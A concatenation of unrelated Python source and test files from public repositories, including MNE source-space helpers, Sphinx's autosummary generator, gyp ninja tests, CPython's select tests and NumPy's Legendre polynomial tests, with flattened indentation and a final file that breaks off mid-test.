assert_equal, assert_, assert_array_less)
from scipy.spatial.distance import cdist
if mode != 'exact' and 'approx' not in mode: # 'nointerp' can be appended
raise RuntimeError('unknown mode %s' % mode)
for si, (s0, s1) in enumerate(zip(src0, src1)):
# first check the keys
a, b = set(s0.keys()), set(s1.keys())
assert_equal(a, b, str(a ^ b))
for name in ['nuse', 'ntri', 'np', 'type', 'id']:
a, b = s0[name], s1[name]
if name == 'id': # workaround for old NumPy bug
a, b = int(a), int(b)
assert_equal(a, b, name)
for name in ['subject_his_id']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
for name in ['interpolator']:
if name in s0 or name in s1:
assert name in s0, f'{name} in s1 but not s0'
assert name in s1, f'{name} in s1 but not s0'
n = np.prod(s0['interpolator'].shape)
diffs = (s0['interpolator'] - s1['interpolator']).data
if len(diffs) > 0 and 'nointerp' not in mode:
# 0.1%
assert_array_less(
np.sqrt(np.sum(diffs * diffs) / n), 0.001,
err_msg=f'{name} > 0.1%')
for name in ['nn', 'rr', 'nuse_tri', 'coord_frame', 'tris']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
if mode == 'exact':
assert_array_equal(s0[name], s1[name], name)
else: # 'approx' in mode
atol = 1e-3 if name == 'nn' else 1e-4
assert_allclose(s0[name], s1[name], rtol=1e-3, atol=atol,
err_msg=name)
for name in ['seg_name']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
# these fields will exist if patch info was added
if nearest:
for name in ['nearest', 'nearest_dist', 'patch_inds']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
atol = 0 if mode == 'exact' else 1e-6
assert_allclose(s0[name], s1[name],
atol=atol, err_msg=name)
for name in ['pinfo']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
assert_(len(s0[name]) == len(s1[name]), name)
for p1, p2 in zip(s0[name], s1[name]):
assert_(all(p1 == p2), name)
if mode == 'exact':
for name in ['inuse', 'vertno', 'use_tris']:
assert_array_equal(s0[name], s1[name], err_msg=name)
for name in ['dist_limit']:
assert_(s0[name] == s1[name], name)
for name in ['dist']:
if s0[name] is not None:
assert_equal(s1[name].shape, s0[name].shape)
assert_(len((s0['dist'] - s1['dist']).data) == 0)
else: # 'approx' in mode:
# deal with vertno, inuse, and use_tris carefully
for ii, s in enumerate((s0, s1)):
assert_array_equal(s['vertno'], np.where(s['inuse'])[0],
'src%s[%s]["vertno"] != '
'np.where(src%s[%s]["inuse"])[0]'
% (ii, si, ii, si))
assert_equal(len(s0['vertno']), len(s1['vertno']))
agreement = np.mean(s0['inuse'] == s1['inuse'])
assert_(agreement >= 0.99, "%s < 0.99" % agreement)
if agreement < 1.0:
# make sure mismatched vertno are within 1.5mm
v0 = np.setdiff1d(s0['vertno'], s1['vertno'])
v1 = np.setdiff1d(s1['vertno'], s0['vertno'])
dists = cdist(s0['rr'][v0], s1['rr'][v1])
assert_allclose(np.min(dists, axis=1), np.zeros(len(v0)),
atol=dist_tol, err_msg='mismatched vertno')
if s0['use_tris'] is not None: # for "spacing"
assert_array_equal(s0['use_tris'].shape, s1['use_tris'].shape)
else:
assert_(s1['use_tris'] is None)
assert_(np.mean(s0['use_tris'] == s1['use_tris']) > 0.99)
# The above "if s0[name] is not None" can be removed once the sample
# dataset is updated to have a source space with distance info
for name in ['working_dir', 'command_line']:
if mode == 'exact':
assert_equal(src0.info[name], src1.info[name])
else: # 'approx' in mode:
if name in src0.info:
assert_(name in src1.info, '"%s" missing' % name)
else:
assert_(name not in src1.info, '"%s" should not exist' % name)
def _set_source_space_vertices(src, vertices):
"""Reset the list of source space vertices."""
assert len(src) == len(vertices)
for s, v in zip(src, vertices):
s['inuse'].fill(0)
s['nuse'] = len(v)
s['vertno'] = np.array(v)
s['inuse'][s['vertno']] = 1
s['use_tris'] = np.array([[]], int)
s['nuse_tri'] = np.array([0])
# This will fix 'patch_info' and 'pinfo'
_adjust_patch_info(s, verbose=False)
return src
def _get_src_nn(s, use_cps=True, vertices=None):
vertices = s['vertno'] if vertices is None else vertices
if use_cps and s.get('patch_inds') is not None:
nn = np.empty((len(vertices), 3))
for vp, p in enumerate(np.searchsorted(s['vertno'], vertices)):
assert(s['vertno'][p] == vertices[vp])
# Project out the surface normal and compute SVD
nn[vp] = np.sum(
s['nn'][s['pinfo'][s['patch_inds'][p]], :], axis=0)
nn /= np.linalg.norm(nn, axis=-1, keepdims=True)
else:
nn = s['nn'][vertices, :]
return nn
@verbose
def compute_distance_to_sensors(src, info, picks=None, trans=None,
verbose=None):
"""Compute distances between vertices and sensors.
Parameters
----------
src : instance of SourceSpaces
The object with vertex positions for which to compute distances to
sensors.
info : instance of Info
Measurement information with sensor positions to which distances shall
be computed.
%(picks_good_data)s
%(trans_not_none)s
%(verbose)s
Returns
-------
depth : array of shape (n_vertices, n_channels)
The Euclidean distances of source space vertices with respect to
sensors.
"""
from scipy.spatial.distance import cdist
assert isinstance(src, SourceSpaces)
_validate_type(info, (Info,), 'info')
# Load the head<->MRI transform if necessary
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
src_trans, _ = _get_trans(trans, allow_none=False)
else:
src_trans = Transform('head', 'head') # Identity transform
# get vertex position in same coordinates as for sensors below
src_pos = np.vstack([
apply_trans(src_trans, s['rr'][s['inuse'].astype(np.bool)])
for s in src
])
# Select channels to be used for distance calculations
picks = _picks_to_idx(info, picks, 'data', exclude=())
# get sensor positions
sensor_pos = []
dev_to_head = None
for ch in picks:
# MEG channels are in device coordinates, translate them to head
if channel_type(info, ch) in ['mag', 'grad']:
if dev_to_head is None:
dev_to_head = _ensure_trans(info['dev_head_t'],
'meg', 'head')
sensor_pos.append(apply_trans(dev_to_head,
info['chs'][ch]['loc'][:3]))
else:
sensor_pos.append(info['chs'][ch]['loc'][:3])
sensor_pos = np.array(sensor_pos)
depths = cdist(src_pos, sensor_pos)
return depths
@verbose
def get_mni_fiducials(subject, subjects_dir=None, verbose=None):
"""Estimate fiducials for a subject.
Parameters
----------
%(subject)s
%(subjects_dir)s
%(verbose)s
Returns
-------
fids_mri : list
List of estimated fiducials (each point in a dict), in the order
LPA, nasion, RPA.
Notes
-----
This takes the ``fsaverage-fiducials.fif`` file included with MNE—which
contain the LPA, nasion, and RPA for the ``fsaverage`` subject—and
transforms them to the given FreeSurfer subject's MRI space.
The MRI of ``fsaverage`` is already in MNI Talairach space, so applying
the inverse of the given subject's MNI Talairach affine transformation
(``$SUBJECTS_DIR/$SUBJECT/mri/transforms/talairach.xfm``) is used
to estimate the subject's fiducial locations.
For more details about the coordinate systems and transformations involved,
see https://surfer.nmr.mgh.harvard.edu/fswiki/CoordinateSystems and
:ref:`plot_source_alignment`.
"""
# Eventually we might want to allow using the MNI Talairach with-skull
# transformation rather than the standard brain-based MNI Talaranch
# transformation, and/or project the points onto the head surface
# (if available).
fname_fids_fs = os.path.join(os.path.dirname(__file__), 'data',
'fsaverage', 'fsaverage-fiducials.fif')
# Read fsaverage fiducials file and subject Talairach.
fids, coord_frame = read_fiducials(fname_fids_fs)
assert coord_frame == FIFF.FIFFV_COORD_MRI
if subject == 'fsaverage':
return fids # special short-circuit for fsaverage
mni_mri_t = invert_transform(read_talxfm(subject, subjects_dir))
for f in fids:
f['r'] = apply_trans(mni_mri_t, f['r'])
return fids
|
neumerance/deploy
|
refs/heads/master
|
.venv/lib/python2.7/site-packages/sphinx/ext/autosummary/generate.py
|
5
|
# -*- coding: utf-8 -*-
"""
sphinx.ext.autosummary.generate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Usable as a library or script to generate automatic RST source files for
items referred to in autosummary:: directives.
Each generated RST file contains a single auto*:: directive which
extracts the docstring of the referred item.
Example Makefile rule::
generate:
sphinx-autogen -o source/generated source/*.rst
:copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import re
import sys
import pydoc
import optparse
from jinja2 import FileSystemLoader, TemplateNotFound
from jinja2.sandbox import SandboxedEnvironment
from sphinx import package_dir
from sphinx.ext.autosummary import import_by_name, get_documenter
from sphinx.jinja2glue import BuiltinTemplateLoader
from sphinx.util.osutil import ensuredir
from sphinx.util.inspect import safe_getattr
def main(argv=sys.argv):
usage = """%prog [OPTIONS] SOURCEFILE ..."""
p = optparse.OptionParser(usage.strip())
p.add_option("-o", "--output-dir", action="store", type="string",
dest="output_dir", default=None,
help="Directory to place all output in")
p.add_option("-s", "--suffix", action="store", type="string",
dest="suffix", default="rst",
help="Default suffix for files (default: %default)")
p.add_option("-t", "--templates", action="store", type="string",
dest="templates", default=None,
help="Custom template directory (default: %default)")
options, args = p.parse_args(argv[1:])
if len(args) < 1:
p.error('no input files given')
generate_autosummary_docs(args, options.output_dir,
"." + options.suffix,
template_dir=options.templates)
def _simple_info(msg):
print msg
def _simple_warn(msg):
print >> sys.stderr, 'WARNING: ' + msg
# -- Generating output ---------------------------------------------------------
def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
warn=_simple_warn, info=_simple_info,
base_path=None, builder=None, template_dir=None):
showed_sources = list(sorted(sources))
if len(showed_sources) > 20:
showed_sources = showed_sources[:10] + ['...'] + showed_sources[-10:]
info('[autosummary] generating autosummary for: %s' %
', '.join(showed_sources))
if output_dir:
info('[autosummary] writing to %s' % output_dir)
if base_path is not None:
sources = [os.path.join(base_path, filename) for filename in sources]
# create our own templating environment
template_dirs = [os.path.join(package_dir, 'ext',
'autosummary', 'templates')]
if builder is not None:
# allow the user to override the templates
template_loader = BuiltinTemplateLoader()
template_loader.init(builder, dirs=template_dirs)
else:
if template_dir:
template_dirs.insert(0, template_dir)
template_loader = FileSystemLoader(template_dirs)
template_env = SandboxedEnvironment(loader=template_loader)
# read
items = find_autosummary_in_files(sources)
# remove possible duplicates
items = dict([(item, True) for item in items]).keys()
# keep track of new files
new_files = []
# write
for name, path, template_name in sorted(items):
if path is None:
# The corresponding autosummary:: directive did not have
# a :toctree: option
continue
path = output_dir or os.path.abspath(path)
ensuredir(path)
try:
name, obj, parent = import_by_name(name)
except ImportError, e:
warn('[autosummary] failed to import %r: %s' % (name, e))
continue
fn = os.path.join(path, name + suffix)
# skip it if it exists
if os.path.isfile(fn):
continue
new_files.append(fn)
f = open(fn, 'w')
try:
doc = get_documenter(obj, parent)
if template_name is not None:
template = template_env.get_template(template_name)
else:
try:
template = template_env.get_template('autosummary/%s.rst'
% doc.objtype)
except TemplateNotFound:
template = template_env.get_template('autosummary/base.rst')
def get_members(obj, typ, include_public=[]):
items = []
for name in dir(obj):
try:
documenter = get_documenter(safe_getattr(obj, name),
obj)
except AttributeError:
continue
if documenter.objtype == typ:
items.append(name)
public = [x for x in items
if x in include_public or not x.startswith('_')]
return public, items
ns = {}
if doc.objtype == 'module':
ns['members'] = dir(obj)
ns['functions'], ns['all_functions'] = \
get_members(obj, 'function')
ns['classes'], ns['all_classes'] = \
get_members(obj, 'class')
ns['exceptions'], ns['all_exceptions'] = \
get_members(obj, 'exception')
elif doc.objtype == 'class':
ns['members'] = dir(obj)
ns['methods'], ns['all_methods'] = \
get_members(obj, 'method', ['__init__'])
ns['attributes'], ns['all_attributes'] = \
get_members(obj, 'attribute')
parts = name.split('.')
if doc.objtype in ('method', 'attribute'):
mod_name = '.'.join(parts[:-2])
cls_name = parts[-2]
obj_name = '.'.join(parts[-2:])
ns['class'] = cls_name
else:
mod_name, obj_name = '.'.join(parts[:-1]), parts[-1]
ns['fullname'] = name
ns['module'] = mod_name
ns['objname'] = obj_name
ns['name'] = parts[-1]
ns['objtype'] = doc.objtype
ns['underline'] = len(name) * '='
rendered = template.render(**ns)
f.write(rendered)
finally:
f.close()
# descend recursively to new files
if new_files:
generate_autosummary_docs(new_files, output_dir=output_dir,
suffix=suffix, warn=warn, info=info,
base_path=base_path, builder=builder,
template_dir=template_dir)
# -- Finding documented entries in files ---------------------------------------
def find_autosummary_in_files(filenames):
"""Find out what items are documented in source/*.rst.
See `find_autosummary_in_lines`.
"""
documented = []
for filename in filenames:
f = open(filename, 'r')
lines = f.read().splitlines()
documented.extend(find_autosummary_in_lines(lines, filename=filename))
f.close()
return documented
def find_autosummary_in_docstring(name, module=None, filename=None):
"""Find out what items are documented in the given object's docstring.
See `find_autosummary_in_lines`.
"""
try:
real_name, obj, parent = import_by_name(name)
lines = pydoc.getdoc(obj).splitlines()
return find_autosummary_in_lines(lines, module=name, filename=filename)
except AttributeError:
pass
except ImportError, e:
print "Failed to import '%s': %s" % (name, e)
return []
def find_autosummary_in_lines(lines, module=None, filename=None):
"""Find out what items appear in autosummary:: directives in the
given lines.
Returns a list of (name, toctree, template) where *name* is a name
of an object and *toctree* the :toctree: path of the corresponding
autosummary directive (relative to the root of the file name), and
*template* the value of the :template: option. *toctree* and
*template* ``None`` if the directive does not have the
corresponding options set.
"""
autosummary_re = re.compile(r'^(\s*)\.\.\s+autosummary::\s*')
automodule_re = re.compile(
r'^\s*\.\.\s+automodule::\s*([A-Za-z0-9_.]+)\s*$')
module_re = re.compile(
r'^\s*\.\.\s+(current)?module::\s*([a-zA-Z0-9_.]+)\s*$')
autosummary_item_re = re.compile(r'^\s+(~?[_a-zA-Z][a-zA-Z0-9_.]*)\s*.*?')
toctree_arg_re = re.compile(r'^\s+:toctree:\s*(.*?)\s*$')
template_arg_re = re.compile(r'^\s+:template:\s*(.*?)\s*$')
documented = []
toctree = None
template = None
current_module = module
in_autosummary = False
base_indent = ""
for line in lines:
if in_autosummary:
m = toctree_arg_re.match(line)
if m:
toctree = m.group(1)
if filename:
toctree = os.path.join(os.path.dirname(filename),
toctree)
continue
m = template_arg_re.match(line)
if m:
template = m.group(1).strip()
continue
if line.strip().startswith(':'):
continue # skip options
m = autosummary_item_re.match(line)
if m:
name = m.group(1).strip()
if name.startswith('~'):
name = name[1:]
if current_module and \
not name.startswith(current_module + '.'):
name = "%s.%s" % (current_module, name)
documented.append((name, toctree, template))
continue
if not line.strip() or line.startswith(base_indent + " "):
continue
in_autosummary = False
m = autosummary_re.match(line)
if m:
in_autosummary = True
base_indent = m.group(1)
toctree = None
template = None
continue
m = automodule_re.search(line)
if m:
current_module = m.group(1).strip()
# recurse into the automodule docstring
documented.extend(find_autosummary_in_docstring(
current_module, filename=filename))
continue
m = module_re.match(line)
if m:
current_module = m.group(2)
continue
return documented
if __name__ == '__main__':
main()
|
jarshwah/django
|
refs/heads/master
|
django/conf/locale/pt_BR/__init__.py
|
12133432
| |
gangadhar-kadam/mtn-erpnext
|
refs/heads/master
|
buying/report/requested_items_to_be_ordered/__init__.py
|
12133432
| |
NicolasHerin/game_book_share
|
refs/heads/master
|
node_modules/node-gyp/gyp/pylib/gyp/generator/ninja_test.py
|
1843
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import sys
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
def test_BinaryNamesWindows(self):
# These cannot run on non-Windows as they require a VS installation to
# correctly handle variable expansion.
if sys.platform.startswith('win'):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'win')
spec = { 'target_name': 'wee' }
self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
endswith('.exe'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.dll'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.lib'))
def test_BinaryNamesLinux(self):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'linux')
spec = { 'target_name': 'wee' }
self.assertTrue('.' not in writer.ComputeOutputFileName(spec,
'executable'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.so'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.a'))
if __name__ == '__main__':
unittest.main()
|
CoDEmanX/ArangoDB
|
refs/heads/devel
|
3rdParty/V8-4.3.61/third_party/python_26/Lib/test/test_select.py
|
56
|
from test import test_support
import unittest
import select
import os
import sys
class SelectTestCase(unittest.TestCase):
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
def test_error_conditions(self):
self.assertRaises(TypeError, select.select, 1, 2, 3)
self.assertRaises(TypeError, select.select, [self.Nope()], [], [])
self.assertRaises(TypeError, select.select, [self.Almost()], [], [])
self.assertRaises(TypeError, select.select, [], [], [], "not a number")
def test_select(self):
if sys.platform[:3] in ('win', 'mac', 'os2', 'riscos'):
if test_support.verbose:
print "Can't test select easily on", sys.platform
return
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
for tout in (0, 1, 2, 4, 8, 16) + (None,)*10:
if test_support.verbose:
print 'timeout =', tout
rfd, wfd, xfd = select.select([p], [], [], tout)
if (rfd, wfd, xfd) == ([], [], []):
continue
if (rfd, wfd, xfd) == ([p], [], []):
line = p.readline()
if test_support.verbose:
print repr(line)
if not line:
if test_support.verbose:
print 'EOF'
break
continue
self.fail('Unexpected return values from select():', rfd, wfd, xfd)
p.close()
def test_main():
test_support.run_unittest(SelectTestCase)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
matmutant/sl4a
|
refs/heads/master
|
python/src/Lib/test/test_select.py
|
56
|
from test import test_support
import unittest
import select
import os
import sys
class SelectTestCase(unittest.TestCase):
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
def test_error_conditions(self):
self.assertRaises(TypeError, select.select, 1, 2, 3)
self.assertRaises(TypeError, select.select, [self.Nope()], [], [])
self.assertRaises(TypeError, select.select, [self.Almost()], [], [])
self.assertRaises(TypeError, select.select, [], [], [], "not a number")
def test_select(self):
if sys.platform[:3] in ('win', 'mac', 'os2', 'riscos'):
if test_support.verbose:
print "Can't test select easily on", sys.platform
return
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
for tout in (0, 1, 2, 4, 8, 16) + (None,)*10:
if test_support.verbose:
print 'timeout =', tout
rfd, wfd, xfd = select.select([p], [], [], tout)
if (rfd, wfd, xfd) == ([], [], []):
continue
if (rfd, wfd, xfd) == ([p], [], []):
line = p.readline()
if test_support.verbose:
print repr(line)
if not line:
if test_support.verbose:
print 'EOF'
break
continue
self.fail('Unexpected return values from select():', rfd, wfd, xfd)
p.close()
def test_main():
test_support.run_unittest(SelectTestCase)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
pizzapanther/Django-Pizza
|
refs/heads/master
|
pizza/calendar/urls.py
|
1
|
from django.conf.urls import patterns, include, url
urlpatterns = patterns('pizza.calendar.views',
url(r'^$', 'events', name='all'),
)
|
valexandersaulys/airbnb_kaggle_contest
|
refs/heads/master
|
venv/lib/python3.4/site-packages/numpy/polynomial/tests/test_legendre.py
|
123
|
"""Tests for legendre module.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import numpy.polynomial.legendre as leg
from numpy.polynomial.polynomial import polyval
from numpy.testing import (
TestCase, assert_almost_equal, assert_raises,
assert_equal, assert_, run_module_suite)
L0 = np.array([1])
L1 = np.array([0, 1])
L2 = np.array([-1, 0, 3])/2
L3 = np.array([0, -3, 0, 5])/2
L4 = np.array([3, 0, -30, 0, 35])/8
L5 = np.array([0, 15, 0, -70, 0, 63])/8
L6 = np.array([-5, 0, 105, 0, -315, 0, 231])/16
L7 = np.array([0, -35, 0, 315, 0, -693, 0, 429])/16
L8 = np.array([35, 0, -1260, 0, 6930, 0, -12012, 0, 6435])/128
L9 = np.array([0, 315, 0, -4620, 0, 18018, 0, -25740, 0, 12155])/128
Llist = [L0, L1, L2, L3, L4, L5, L6, L7, L8, L9]
def trim(x):
return leg.legtrim(x, tol=1e-6)
class TestConstants(TestCase):
def test_legdomain(self):
assert_equal(leg.legdomain, [-1, 1])
def test_legzero(self):
assert_equal(leg.legzero, [0])
def test_legone(self):
assert_equal(leg.legone, [1])
def test_legx(self):
assert_equal(leg.legx, [0, 1])
class TestArithmetic(TestCase):
x = np.linspace(-1, 1, 100)
def test_legadd(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] += 1
res = leg.legadd([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_legsub(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
tgt = np.zeros(max(i, j) + 1)
tgt[i] += 1
tgt[j] -= 1
res = leg.legsub([0]*i + [1], [0]*j + [1])
assert_equal(trim(res), trim(tgt), err_msg=msg)
def test_legmulx(self):
assert_equal(leg.legmulx([0]), [0])
assert_equal(leg.legmulx([1]), [0, 1])
for i in range(1, 5):
tmp = 2*i + 1
ser = [0]*i + [1]
tgt = [0]*(i - 1) + [i/tmp, 0, (i + 1)/tmp]
assert_equal(leg.legmulx(ser), tgt)
def test_legmul(self):
# check values of result
for i in range(5):
pol1 = [0]*i + [1]
val1 = leg.legval(self.x, pol1)
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
pol2 = [0]*j + [1]
val2 = leg.legval(self.x, pol2)
pol3 = leg.legmul(pol1, pol2)
val3 = leg.legval(self.x, pol3)
assert_(len(pol3) == i + j + 1, msg)
assert_almost_equal(val3, val1*val2, err_msg=msg)
def test_legdiv(self):
for i in range(5):
for j in range(5):
msg = "At i=%d, j=%d" % (i, j)
ci = [0]*i + [1]
cj = [0]*j + [1]
tgt = leg.legadd(ci, cj)
quo, rem = leg.legdiv(tgt, ci)
res = leg.legadd(leg.legmul(quo, ci), rem)
assert_equal(trim(res), trim(tgt), err_msg=msg)
class TestEvaluation(TestCase):
# coefficients of 1 + 2*x + 3*x**2
c1d = np.array([2., 2., 2.])
c2d = np.einsum('i,j->ij', c1d, c1d)
c3d = np.einsum('i,j,k->ijk', c1d, c1d, c1d)
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
y = polyval(x, [1., 2., 3.])
def test_legval(self):
#check empty input
assert_equal(leg.legval([], [1]).size, 0)
#check normal input)
x = np.linspace(-1, 1)
y = [polyval(x, c) for c in Llist]
for i in range(10):
msg = "At i=%d" % i
tgt = y[i]
res = leg.legval(x, [0]*i + [1])
assert_almost_equal(res, tgt, err_msg=msg)
#check that shape is preserved
for i in range(3):
dims = [2]*i
x = np.zeros(dims)
assert_equal(leg.legval(x, [1]).shape, dims)
assert_equal(leg.legval(x, [1, 0]).shape, dims)
assert_equal(leg.legval(x, [1, 0, 0]).shape, dims)
def test_legval2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, leg.legval2d, x1, x2[:2], self.c2d)
#test values
tgt = y1*y2
res = leg.legval2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.legval2d(z, z, self.c2d)
assert_(res.shape == (2, 3))
def test_legval3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test exceptions
assert_raises(ValueError, leg.legval3d, x1, x2, x3[:2], self.c3d)
#test values
tgt = y1*y2*y3
res = leg.legval3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.legval3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3))
def test_leggrid2d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j->ij', y1, y2)
res = leg.leggrid2d(x1, x2, self.c2d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.leggrid2d(z, z, self.c2d)
assert_(res.shape == (2, 3)*2)
def test_leggrid3d(self):
x1, x2, x3 = self.x
y1, y2, y3 = self.y
#test values
tgt = np.einsum('i,j,k->ijk', y1, y2, y3)
res = leg.leggrid3d(x1, x2, x3, self.c3d)
assert_almost_equal(res, tgt)
#test shape
z = np.ones((2, 3))
res = leg.leggrid3d(z, z, z, self.c3d)
assert_(res.shape == (2, 3)*3)
class TestIntegral(TestCase):
def test_legint(self):
# check exceptions
assert_raises(ValueError, leg.legint, [0], .5)
assert_raises(ValueError, leg.legint, [0], -1)
assert_raises(ValueError, leg.legint, [0], 1, [0, 0])
# test integration of zero polynomial
for i in range(2, 5):
k = [0]*(i - 2) + [1]
res = leg.legint([0], m=i, k=k)
assert_almost_equal(res, [0, 1])
# check single integration with integration constant
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [1/scl]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i])
res = leg.leg2poly(legint)
assert_almost_equal(trim(res), trim(tgt))
# check single integration with integration constant and lbnd
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i], lbnd=-1)
assert_almost_equal(leg.legval(-1, legint), i)
# check single integration with integration constant and scaling
for i in range(5):
scl = i + 1
pol = [0]*i + [1]
tgt = [i] + [0]*i + [2/scl]
legpol = leg.poly2leg(pol)
legint = leg.legint(legpol, m=1, k=[i], scl=2)
res = leg.leg2poly(legint)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with default k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1)
res = leg.legint(pol, m=j)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with defined k
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k])
res = leg.legint(pol, m=j, k=list(range(j)))
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with lbnd
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k], lbnd=-1)
res = leg.legint(pol, m=j, k=list(range(j)), lbnd=-1)
assert_almost_equal(trim(res), trim(tgt))
# check multiple integrations with scaling
for i in range(5):
for j in range(2, 5):
pol = [0]*i + [1]
tgt = pol[:]
for k in range(j):
tgt = leg.legint(tgt, m=1, k=[k], scl=2)
res = leg.legint(pol, m=j, k=list(range(j)), scl=2)
assert_almost_equal(trim(res), trim(tgt))
def test_legint_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([leg.legint(c) for c in c2d.T]).T
res = leg.legint(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legint(c) for c in c2d])
res = leg.legint(c2d, axis=1)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legint(c, k=3) for c in c2d])
res = leg.legint(c2d, k=3, axis=1)
assert_almost_equal(res, tgt)
class TestDerivative(TestCase):
def test_legder(self):
# check exceptions
assert_raises(ValueError, leg.legder, [0], .5)
assert_raises(ValueError, leg.legder, [0], -1)
# check that zeroth deriviative does nothing
for i in range(5):
tgt = [0]*i + [1]
res = leg.legder(tgt, m=0)
assert_equal(trim(res), trim(tgt))
# check that derivation is the inverse of integration
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = leg.legder(leg.legint(tgt, m=j), m=j)
assert_almost_equal(trim(res), trim(tgt))
# check derivation with scaling
for i in range(5):
for j in range(2, 5):
tgt = [0]*i + [1]
res = leg.legder(leg.legint(tgt, m=j, scl=2), m=j, scl=.5)
assert_almost_equal(trim(res), trim(tgt))
def test_legder_axis(self):
# check that axis keyword works
c2d = np.random.random((3, 4))
tgt = np.vstack([leg.legder(c) for c in c2d.T]).T
res = leg.legder(c2d, axis=0)
assert_almost_equal(res, tgt)
tgt = np.vstack([leg.legder(c) for c in c2d])
res = leg.legder(c2d, axis=1)
assert_almost_equal(res, tgt)
class TestVander(TestCase):
# some random values in [-1, 1)
x = np.random.random((3, 5))*2 - 1
def test_legvander(self):
# check for 1d x
x = np.arange(3)
v = leg.legvander(x, 3)
assert_(v.shape == (3, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], leg.legval(x, coef))
# check for 2d x
x = np.array([[1, 2], [3, 4], [5, 6]])
v = leg.legvander(x, 3)
assert_(v.shape == (3, 2, 4))
for i in range(4):
coef = [0]*i + [1]
assert_almost_equal(v[..., i], leg.legval(x, coef))
def test_legvander2d(self):
# also tests polyval2d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3))
van = leg.legvander2d(x1, x2, [1, 2])
tgt = leg.legval2d(x1, x2, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = leg.legvander2d([x1], [x2], [1, 2])
assert_(van.shape == (1, 5, 6))
def test_legvander3d(self):
# also tests polyval3d for non-square coefficient array
x1, x2, x3 = self.x
c = np.random.random((2, 3, 4))
van = leg.legvander3d(x1, x2, x3, [1, 2, 3])
tgt = leg.legval3d(x1, x2, x3, c)
res = np.dot(van, c.flat)
assert_almost_equal(res, tgt)
# check shape
van = leg.legvander3d([x1], [x2], [x3], [1, 2, 3])
assert_(van.shape == (1, 5, 24))
class TestFitting(TestCase):
def test_legfit(self):
def f(x):
return x*(x - 1)*(x - 2)
# Test exceptions
assert_raises(ValueError, leg.legfit, [1], [1], -1)
assert_raises(TypeError, leg.legfit, [[1]], [1], 0)
assert_raises(TypeError, leg.legfit, [], [1], 0)
assert_raises(TypeError, leg.legfit, [1], [[[1]]], 0)
assert_raises(TypeError, leg.legfit, [1, 2], [1], 0)
